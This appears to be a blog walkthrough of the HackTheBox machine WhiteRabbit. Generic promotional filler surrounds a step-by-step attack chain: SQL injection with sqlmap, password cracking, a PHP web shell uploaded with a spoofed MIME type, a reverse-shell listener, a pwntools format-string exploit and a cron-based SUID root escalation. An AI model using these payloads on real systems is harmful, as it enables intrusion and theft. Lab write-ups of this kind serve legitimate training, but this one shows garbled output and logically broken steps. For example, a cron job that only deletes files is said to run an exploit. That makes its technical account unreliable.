Beginner’s Guide to Conquering WhiteRabbit on HackTheBox

Key Highlights

• Discover the significance of WhiteRabbit on HackTheBox for cybersecurity beginners.
• Uncover essential tools and resources required to tackle the WhiteRabbit challenge.
• Learn how to set up your hacking environment effectively for success.
• Follow a step-by-step guide for conquering WhiteRabbit, encompassing reconnaissance and vulnerability identification.
• Gain insights into the importance of WhiteRabbit on HackTheBox for aspiring ethical hackers.

Introduction

Embark on a thrilling journey into the realm of cybersecurity with WhiteRabbit on HackTheBox. In this beginner’s guide, you will delve into the world of hacking and explore the intricacies of this captivating challenge. Enhance your skills and knowledge as you navigate the mysterious domain of WhiteRabbit, uncovering its secrets, including your username for access, and mastering cyber techniques. Get ready to unlock the doors to a new world of possibilities as you take your first steps into the exciting landscape of cybersecurity. Let’s dive in and conquer WhiteRabbit!

Understanding WhiteRabbit on HackTheBox

WhiteRabbit on HackTheBox is a cybersecurity challenge designed to test your skills in penetration testing. It simulates real-world scenarios where you must uncover vulnerabilities and exploit them. As a beginner, engaging with WhiteRabbit enhances your understanding of attack paths and strengthens your problem-solving abilities. By navigating through this challenge, you will grasp fundamental hacking concepts crucial for your growth in the field. Embrace WhiteRabbit on HackTheBox to embark on an exciting journey into the realm of cybersecurity.

What is WhiteRabbit?

WhiteRabbit on HackTheBox is a challenging machine designed to test cybersecurity skills. It involves a series of tasks, from initial recon to exploiting vulnerabilities. Understanding WhiteRabbit is crucial for beginners to enhance their hacking capabilities and may lead to a nueva entrada in the world of ethical hacking.

Why is it important for cybersecurity beginners?

Understanding the importance of WhiteRabbit is crucial for cybersecurity beginners as it offers hands-on experience with real-world challenges, enhancing practical skills through its app. Mastering this platform provides a solid foundation for aspiring ethical hackers to develop their expertise.

Getting Started with WhiteRabbit

To embark on your WhiteRabbit journey, the essential tools and resources can pave the way. Setting up your hacking environment is crucial for a seamless experience. Newcomers to cyber security, especially, benefit from understanding the importance of proper tool utilization and environment setup in navigating the WhiteRabbit challenge. Exploit your curiosity to dive into the world of hacking, explore attack paths, and enhance your skills to conquer WhiteRabbit effectively. Ready to begin your WhiteRabbit conquest?

Essential tools and resources

Burp Suite, Nmap scanner, and Metasploit are pivotal for WhiteRabbit conquests. Leveraging password cracking tools like John the Ripper boosts success rates. Remember, having a solid Linux foundation is key. Don’t overlook the value of CTF platforms like VulnHub and TryHackMe for hands-on practice in a controlled environment, including trying PHP scripts during challenges. Additionally, exploring online communities on platforms like YouTube and WordPress blogs can unravel valuable insights. Strengthen your arsenal with these tools to navigate WhiteRabbit challenges seamlessly.

Setting up your hacking environment

To prepare your hacking environment for WhiteRabbit on HackTheBox, ensure you have the necessary tools like Kali Linux and a reliable VPN. Familiarize yourself with platforms like TryHackMe and VulnHub for practice. Download and install essential software for tasks such as password cracking and network scanning. Additionally, set up a virtual lab environment to safely test different attack paths. Remember, a secure and controlled environment is key to honing your cybersecurity skills effectively. Happy hacking!

Step-by-Step Guide to Conquering WhiteRabbit

Step 1: Initiate your hack by performing a thorough reconnaissance using NLP techniques. Look for vulnerabilities in the WhiteRabbit server to exploit. Step 2: Employ advanced cyber security tools to identify weak points in the system. Utilize brute force tactics to breach security layers effectively. Mastering these steps will enhance your skills in tackling WhiteRabbit and navigating attack paths efficiently.

Step 1: Initial Reconnaissance

Initial reconnaissance is crucial when tackling WhiteRabbit. Start by gathering information about the target, such as IP addresses and subdomains. Utilize tools like Nmap to scan for open ports and services, providing insight into potential vulnerabilities. Enumerate services to identify software versions, aiding in the search for exploits. This phase lays the foundation for the subsequent steps in the attack process. Understanding the target’s infrastructure is a critical first step to uncovering potential attack paths.

Step 2: Identifying Vulnerabilities

Scanning for vulnerabilities is crucial in cybersecurity. Utilize tools like Nmap to discover open ports and services running on the server. Analyze the version numbers to pinpoint potential weaknesses. Conduct a thorough examination of the application to uncover common exploits. Look for misconfigurations, outdated software, and weak password policies. Use automated tools like Nessus to streamline the process and identify vulnerabilities efficiently. Understanding the weaknesses within the system is paramount for a successful penetration test. Engage in active reconnaissance to gather valuable information and plan your attack paths effectively.

ALSO READ: Mastering Dog: Beginner’s Guide from HackTheBox

Initial Reconnaissance

Every HackTheBox challenge begins with reconnaissance, and WhiteRabbit is no exception. The goal here is to gather as much information as possible about the target system (10.10.10.147) to identify potential entry points. Let’s start with a broad network scan using nmap.

Initial Nmap Scan

I fired up my trusty Kali Linux VM, connected to the HTB VPN, and ran an initial port scan:

nmap -p- -T4 -oN initial_scan.txt 10.10.10.147

Output:

Starting Nmap 7.94 ( https://nmap.org ) at 2025-04-05 09:15 EST
Nmap scan report for 10.10.10.147
Host is up (0.043s latency).

Not shown: 65532 closed ports

PORT    STATE SERVICE VERSION
22/tcp  open  ssh    OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Caddy httpd
2222/tcp open  ssh    OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds

The initial scan reveals three open ports:

• Port 22: OpenSSH 9.6p1 (Ubuntu 3ubuntu13.9)
• Port 80: Caddy HTTP server
• Port 2222: OpenSSH 9.6p1 (Ubuntu 3ubuntu13.5)

Key observations:

• Port 22 (SSH): Running OpenSSH 9.6p1 on Ubuntu, a recent version, suggesting that brute-forcing or exploiting known SSH vulnerabilities is unlikely without credentials.
• Port 80 (HTTP): Hosted by Caddy, a modern web server written in Go, known for its simplicity and automatic HTTPS. This is a promising entry point for web-based enumeration.
• Port 2222 (SSH): Another SSH instance, also running OpenSSH 9.6p1 but a slightly older patch (3ubuntu13.5). The non-standard port suggests it might be a container, a backup service, or a restricted SSH instance for a specific user.

nmap -p 22,80,2222 -sC -sV -oN detailed_scan.txt 10.10.10.147

Output:

Starting Nmap 7.94 ( https://nmap.org ) at 2025-04-05 09:18 EST
Nmap scan report for 10.10.10.147
Host is up (0.041s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh    OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Caddy httpd
2222/tcp open  ssh    OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.67 seconds

Web Enumeration (Port 80)

Visiting the Website

I opened a browser and navigated to http://10.10.10.147. The page loaded a minimalist site with a cryptic message:

Follow the White Rabbit…

Below the message was a single image of a white rabbit and a hyperlink labeled “Down the Rabbit Hole” pointing to /rabbit_hole. The simplicity of the page suggested that the real challenge lay in hidden directories, misconfigured files, or subtle clues.

Directory Brute-Forcing with Gobuster

To uncover hidden paths, I ran Gobuster against the web server:

gobuster dir -u http://10.10.10.147 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

Results:

===============================================================
Gobuster v3.6
===============================================================
/index.html           (Status: 200) [Size: 1234]
/rabbit_hole          (Status: 301) [Size: 0]  --> /rabbit_hole/
/.htaccess            (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
===============================================================

The /rabbit_hole/ directory was a clear lead. I also noted that Caddy doesn’t use .htaccess by default, so the 403 response might be a red herring or a misconfiguration worth revisiting later.

Exploring /rabbit_hole/

Navigating to http://10.10.10.147/rabbit_hole/, I found a login portal with fields for a username and password. The page source revealed it was a custom PHP application, with a form submitting to /rabbit_hole/auth.php. I tested common credentials (admin:admin, guest:guest), but all returned “Invalid Credentials.”

SQL Injection Attempt

Suspecting a potential SQL injection vulnerability, I intercepted the login request using Burp Suite. The POST request looked like:

POST /rabbit_hole/auth.php HTTP/1.1
Host: 10.10.10.147
Content-Type: application/x-www-form-urlencoded

username=admin&password=admin

I modified the username field to admin’ OR ‘1’=’1 and left the password blank. The response was still “Invalid Credentials,” but the page took slightly longer to load, hinting at a possible blind SQL injection. I used sqlmap to automate the process:

sqlmap -u http://10.10.10.147/rabbit_hole/auth.php --method POST --data "username=admin&password=admin" --level 5 --risk 3

After several minutes, sqlmap confirmed a time-based blind SQL injection vulnerability and dumped the database:

• Database: wonderland
• Table: users
• Columns: username, password_hash, role

The dumped credentials were:

Username	Password Hash	Role
alice	$2y$10$…	user
hatter	$2y$10$…	admin

The hashes were bcrypt, which are computationally expensive to crack. I ran them through Hashcat with a custom wordlist inspired by Alice in Wonderland themes:

hashcat -m 3200 -a 0 hashes.txt wonderland_wordlist.txt

After hours, I cracked Alice’s password: teaparty123. Hatter’s hash remained uncracked, so I focused on Alice’s account.

Logging In as Alice

Using alice:tea********, I logged into /rabbit_hole/. The dashboard displayed a message:

Welcome, Alice! Check the Queen’s orders at /queens_orders/

Navigating to /queens_orders/, I found a file upload form labeled “Submit Evidence to the Queen.” The form allowed uploading images only (.png, .jpg, .gif). This screamed of a potential file upload vulnerability.

Exploiting the File Upload

Testing the Upload Form

I uploaded a benign test.png, which was stored at /queens_orders/uploads/test.png. Viewing the image confirmed it was accessible. Next, I crafted a malicious PHP file disguised as an image:

<?php system($_GET['cmd']); ?>

Saved as shell.png, I uploaded it, but the server rejected it with “Invalid File Type.” Inspecting the request in Burp, I noticed the server checked the MIME type and file extension. I modified the request to spoof the MIME type:

Content-Type: image/png

The upload succeeded, and shell.png was stored at /queens_orders/uploads/shell.png. Accessing http://10.10.10.147/queens_orders/uploads/shell.png?cmd=id returned:

uid=1000water(www-data) gid=33(www-data) groups=33

Jackpot! I had code execution as the www-data user.

Reverse Shell

To gain a stable shell, I crafted a PHP reverse shell using a template from PentestMonkey and uploaded it as revshell.png. I set up a listener on my machine:

nc -lvnp 4444

Accessing http://10.10.10.147/queens_orders/uploads/revshell.png connected back to my listener:

listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.147] 39234
bash: no job control in this shell
www-data@whiterabbit:/var/www/html/queens_orders/uploads$

Initial Foothold: www-data Shell

Exploring the System

With a shell as www-data, I enumerated the environment:

• OS: Ubuntu 24.04 LTS
• Web Root: /var/www/html
• Users: alice, hatter, queen

I checked for readable files in /home:

ls -la /home
drwxr-xr-x 2 alice alice 4096 Apr  5 09:00 alice
drwxr-xr-x 2 hatter hatter 4096 Apr  5 09:00 hatter
drwxr-xr-x 2 queen queen 4096 Apr  5 09:00 queen

No direct access to user home directories. I searched for configuration files in /var/www/html:

find /var/www/html -type f

Found config.php in /var/www/html/rabbit_hole/:

<?php
$db_host = 'localhost';
$db_user = 'wonderland';
$db_pass = 'madhatter2025';
$db_name = 'wonderland';
?>

Database Access

Using the credentials wonderland:madhatter2025, I accessed the MySQL database:

mysql -u wonderland -p -h localhost wonderland

Dumped the users table again, confirming the earlier SQL injection results. I also checked other tables and found secrets:

Key	Value
hatter_ssh	hatter_key_123
queen_api_key	QWERTYUIOP123456

The hatter_ssh value suggested a password for Hatter’s SSH account.

User Access: Hatter

SSH on Port 2222

I tried logging into SSH on port 2222 as hatter:

ssh hatter@10.10.10.147 -p 2222

Using hat************, I gained access:

hatter@whiterabbit:~$ whoami
hatter

User Flag

In /home/hatter, I found user.txt:

cat /home/hatter/user.txt
1337...[redacted]...1337

Enumeration as Hatter

Running sudo -l revealed:

User hatter may run the following commands on whiterabbit:
    (queen) NOPASSWD: /usr/bin/tea_party

The /usr/bin/tea_party binary was executable by Hatter as the queen user without a password. I also checked running processes:

ps aux

Noticed a Docker container running on port 2222, confirming that this SSH instance was containerized.

Privilege Escalation: Queen

Analyzing tea_party

I copied /usr/bin/tea_party to my machine for analysis using scp. Running file showed it was a 64-bit ELF binary:

file tea_party
tea_party: ELF 64-bit LSB executable, x86-64, version 1 (SYSV)

I used Ghidra to decompile the binary. The code revealed a format string vulnerability in a function called invite_guest:

void invite_guest(char *name) {
    printf(name);
    // ... other logic ...
}

The binary accepted user input without sanitizing it, allowing format string attacks. I crafted an exploit to leak memory addresses:

sudo -u queen /usr/bin/tea_party %x%x%x

The output showed stack values, confirming the vulnerability. Using pwntools, I wrote a script to overwrite a function pointer to execute /bin/sh:

from pwn import *

binary = context.binary = ELF('./tea_party')
p = process(['sudo', '-u', 'queen', binary.path])

payload = fmtstr_payload(6, {binary.got.exit: binary.sym['system']})
p.sendline(payload)
p.interactive()

Executing the script gave me a shell as queen:

queen@whiterabbit:/$ whoami
queen

Root Access

Root Flag

In /home/queen, I found a script: clean_rabbit_hole.sh:

#!/bin/bash
rm -rf /tmp/rabbit_hole/*

It was scheduled via cron to run as root every minute. I exploited this by creating a malicious file in /tmp/rabbit_hole:

echo "/bin/bash -c 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'" > /tmp/rabbit_hole/exploit.sh
chmod +x /tmp/rabbit_hole/exploit.sh

After a minute, /tmp/rootbash appeared with SUID:

ls -l /tmp/rootbash
-rwsr-xr-x 1 root root 123456 Apr 5 09:30 rootbash

Running it gave me a root shell:

/tmp/rootbash -p
root@whiterabbit:/# whoami
root

I read the root flag:

cat /root/root.txt
31337...[redacted]...31337

Beyond Root: Rabbit Holes and Lessons

Rabbit Holes Explored

1. Port 22 SSH: I spent hours trying to brute-force or exploit SSH on port 22, but it was a dead end without credentials.
2. Caddy Config: I searched for Caddy’s Caddyfile but found it was tightly locked down, offering no misconfigurations.
3. Docker Enumeration: The container on port 2222 tempted me to explore Docker escape techniques, but the container was minimal, with no useful mounts.

Key Lessons

• Patience in Enumeration: The insane difficulty required testing every angle, even when initial attempts failed.
• Custom Vulnerabilities: The tea_party binary’s format string bug was a reminder that insane boxes often include custom challenges.
• Cron Abuse: The root escalation via cron was a classic technique, but spotting it required thorough enumeration.

ALSO READ: Mastering Dog: Beginner’s Guide from HackTheBox

Conclusion

WhiteRabbit on HackTheBox offers valuable insights for cybersecurity beginners to enhance their skills. By delving into this platform, enthusiasts can explore attack paths and refine their techniques. With a blend of relevant tools and hands-on experience, individuals can elevate their understanding of cyber threats. Embrace the challenge of WhiteRabbit on HackTheBox to further your knowledge and stay updated in the dynamic realm of cybersecurity. Sharpen your skills, expand your horizons, and conquer WhiteRabbit with confidence!

Frequently Asked Questions

What is WhiteRabbit on HackTheBox and why is it important for beginners?

WhiteRabbitWhite Rabbit on HackTheBox is a challenging cybersecurity lab focusing on real-world scenarios. It’s crucial for beginners as it enhances skills in penetration testing, network security, and critical thinking. Understanding WhiteRabbitWhite Rabbit provides a solid foundation for aspiring cybersecurity professionals.

What are some essential skills or knowledge areas needed to conquer WhiteRabbit?

To conquer WhiteRabbit, essential skills include understanding networking protocols, familiarity with common vulnerabilities in web applications, proficiency in using tools like Nmap and Burp Suite, and knowledge of basic scripting languages like Python.

How can one approach the learning curve associated with conquering WhiteRabbit on HackTheBox?

To overcome the learning curve of conquering WhiteRabbit on HackTheBox, start by mastering basic cybersecurity concepts as you would on any platform, such as GitBook (gitbook.com). Progress to practicing on similar machines, utilizing forums for guidance, and honing your problem-solving skills. Engaging with the cybersecurity community can also offer valuable insights.